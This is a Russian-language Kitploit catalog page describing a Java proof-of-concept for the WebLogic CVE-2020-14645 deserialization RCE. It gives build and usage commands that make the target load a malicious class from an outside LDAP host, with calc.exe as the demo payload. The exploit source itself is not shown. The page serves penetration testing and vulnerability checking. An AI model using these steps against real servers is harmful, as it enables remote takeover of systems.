Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Weblogic_CVE-2020-14645 — Java PoC для десериализационной RCE в WebLogic CVE-2020-14645 Coherence. Размещает вредоносный класс через LDAP и вызывает удалённое выполнение кода на уязвимых серверах WebLogic. | Kitploit
Инструменты/GitHubGitHub/jlvsjp/weblogic_cve-2020-14645
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHub
jlvsjp/weblogic_cve-2020-14645

Weblogic_CVE-2020-14645

Java PoC для десериализационной RCE в WebLogic CVE-2020-14645 Coherence. Размещает вредоносный класс через LDAP и вызывает удалённое выполнение кода на уязвимых серверах WebLogic.

Репозиторий
166 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Программа проверки уязвимости десериализации Weblogic CVE-2020-14645 coherence

Окружение

  • Maven 3

  • JDK 1.8

Компиляция

root@kitploit:~
mvn package

Использование

Конкретные шаги тестирования:

  1. Написать POC
  2. Скомпилировать POC в файл class
  3. Запустить статический сайт для публикации скомпилированного POC
  4. Запустить LDAP-прокси для перенаправления запросов тестовой цели на получение POC
  5. Запуск тестовой программы

Поскольку эта уязвимость похожа на уязвимость Apache Dubbo, пожалуйста, обратитесь к этой уязвимости для реализации шагов 1-4.

Запуск тестовой программы

root@kitploit:~
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL

# Пример
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002

Если использовать POC, предоставленный в этом примере, после успешной эксплуатации тестируемая цель выполнит calc.exe. Пожалуйста, самостоятельно измените POC в соответствии с окружением тестируемой цели.

Благодарности

Этот проект ссылается и использует часть кода проектов @Y4er @5up3rc, выражаем особую благодарность!

Справочные материалы

https://github.com/Y4er/CVE-2020-14645

https://github.com/5up3rc/weblogic_cmd

Скачать инструмент